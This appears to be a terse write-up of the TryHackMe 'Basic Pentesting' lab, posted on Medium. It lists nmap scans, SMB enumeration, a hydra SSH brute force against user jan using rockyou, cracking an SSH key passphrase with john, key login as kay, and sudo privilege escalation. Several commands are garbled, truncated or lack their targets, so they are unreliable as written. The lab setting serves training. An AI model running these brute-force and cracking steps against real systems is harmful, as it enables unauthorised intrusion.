Try Hack ME — Basic Pentesting


nmap -sC -sV -O -oA simple_scan
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file named simple_scan
nmap -sC -sV -O -p- -oA full_scan
nmap -sU -O -p- -oA udp_scan


python3 -u -e *
  1. SMB has been configured.
  2. Apache structs version 2.5.12 running
  3. J’s password is weak and easily crack-able.
smbclinet -L
smbclinet //
cat staff.txt
hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 4 ssh://
python /usr/share/john/ basic_key > basic_key_hash
john --wordlist=/usr/share/wordlists/rockyou.txt basic_key_hash
chmod 600 basic_key
ssh -i basic_key kay@

Privilege Escalation

sudo -l
sudo su



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store